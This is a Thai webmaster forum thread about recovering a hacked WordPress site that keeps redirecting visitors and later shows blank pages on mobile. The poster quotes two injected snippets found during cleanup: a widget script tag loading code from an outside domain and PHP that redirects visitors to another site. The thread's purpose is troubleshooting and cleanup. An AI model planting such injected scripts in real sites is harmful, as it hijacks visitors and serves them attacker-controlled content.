ต่อไป »

[amino10]

สวัสดีครับทุกๆท่าน

ตอนนี้ผมเปิดเว็ป Planforfit.com อยู่ ซึ่งก็ใช้งานอะไรได้ตามปกติ

แต่วันที่ 22 เว็ปโดนแฮค  จากนั้นเอาโค๊ดกับข้อมูลที่ backup ไว้มาใช้   (ภาพ  http://bit.ly/1dmXNJf  )
วันที่ 24 เจอปัญหาว่า พอเข้าเว็ปแล้วจะ redirect ไปที่ Shoppingfordress.com  ซึ่งบางครั้งเปิดก็ไม่รี
เลยไปมัคร sucuri  ให้เค้าเช็คเว็ปและลบ malware ให้ หลังจากลบเสร็จแล้ว ก็ยัง redirect ไปที่ Shoppingfordress.comอยู่


กลับไล่ดูอีกครั้งเจอว่าแฮคเกอร์ฝังโค๊ดเอาไว้ตรง widget     มีสร้าง admin เอาไว้
Home<script src=http://a.c0594.com/?js=1></script></a>
(ภาพ  http://bit.ly/1IBfduA )

ก็ทำการลบออกไปทั้งหมด  แต่ก็ยังไม่หาย

จากนั้น string locator ออกมา  ในไฟล์ wp-config.php มันมีตัวนึงโผล่ขึ้นมา

define('DISALLOW_FILE_EDIT',true);  ไป comment out ออก

  sucuri เช็คอีกครั้ง จนสุดท้ายแล้ว ไม่ Redirect ไปหน้าอื่นแล้วครับ

แต่ดันมาเจอปัญหาคือ บางคนเข้าไปที่เว็ปแล้ว มันเป็นหน้าขาวๆ  ไม่มีข้อมูลอะไรขึ้นมาเลยครับ
(ภาพ http://bit.ly/1HlBZtQ )

เท่าที่ลองสังเกตุ
- เวลาเปิดผ่านมือถือ จะเจออากาาหน้าขาวๆ มากกว่าเปิดผ่าน destop
- เวลาเปิดช่วงคนเข้าเยอะ ( 2-5 ทุ่ม) จะเป็นบ่อย


ตอนนี้ไม่รู้จะแก้ยังไงแล้วครับ  รบกวนขอคำแนะนำจากพี่ๆในนี้ครับ

ขอขอบคุณล่วงหน้าครับ

[Jir4yu]

เบื้องต้นลองแก้ wp-config.php ให้แสดงข้อความ dedug ดูก่อนครับ
WP_DEBUG เปลี่ยนค่าเป็น true แล้วลองดูผลลัพธ์ครับ

[amino10]

ยังไม่หายครับ  T T

[kingofdollars]

เวลาผมเจอแบบนี้

เปลี่ยนชื่อ public_html เดิม เป็นชื่อใหม่  เอาไว้  backup
แล้วสร้าง public_html ใหม่  ลง wordpress ใหม่

แก้ config  ให้ชี้ไป Database ตัวเดิม ก็หายแล้วครับ

[shinrafenr]

ลอง reset permalink ดูรึยังคับ

[BrainFreeze]

ลองทำตามนี้ครับส่วนใหญ่หายขาดไม่โดนอีก วิธีแก้ Wordpress ถูก Hack
https://support.hostatom.com/k...tion=displayarticle&id=318

[amino10]

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ

[BrainFreeze]

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ

ถ้าเคยโดนเจาะแล้ว อาจต้องตรวจซ้ำดีๆ ครับ
- เชค database รึยังครับว่าไม่มีอะไรแปลกปลอมเหลืออยู่มั้ย
- อัพ wp เข้าไปทับ บางที่ hacker วาง backdoor ไว้ชื่อไฟล์อื่นมันไม่ทับให้นะครับ

[amino10]

โปรแกรมเมอร์ไปเจออีกคริป (ของแฮคเกอร์คนเดิม)

เป็น script ที่พยายามจะ redirect เหมือนกัน
$url = "http://com-7kb.net/?a=356179&a...;c=wl_garc&s=planforfitcom ";
exit('<script>document.location.href = "'.$url.'";</script>');


ซึ่งลบออกไปแล้วครับ

  ทั้งอัพไฟล์ wp ใหม่ ทั้ง theme
  ลบ plugin อื่นๆที่ไม่ใช้ ออกไปแล้ว

ตอนนี้ก็ยังมีอาการนี้อยู่ครับ

อาการจะเป็นแบบนี้ครับ
- เวลาเอาลิ้งบทความไปโพสใน FB หรือส่งลิ้งนี้ให้คนอื่นเปิด  บางลิ้งก็เป็นหน้าขาว บางลิ้งก็ไม่เป็นครับ   (แต่ถ้าเข้าเว็ปโดยตรง แล้วเสริชหาบทความนั้น สามารถเข้าได้ตามปกติ)
- ส่วนมากจะเป็นตอนที่เข้าผ่านมือถือ
- เป็นแล้วก็หายเองได้ครับ  ไม่ได้เป็นตลอดไปครับ

ถ้าเคยโดนเจาะแล้ว อาจต้องตรวจซ้ำดีๆ ครับ
- เชค database รึยังครับว่าไม่มีอะไรแปลกปลอมเหลืออยู่มั้ย
- อัพ wp เข้าไปทับ บางที่ hacker วาง backdoor ไว้ชื่อไฟล์อื่นมันไม่ทับให้นะครับ

เท่าที่ประเมินดูแล้ว คิดว่าทำใหม่น่าจะง่ายกว่าครับ T T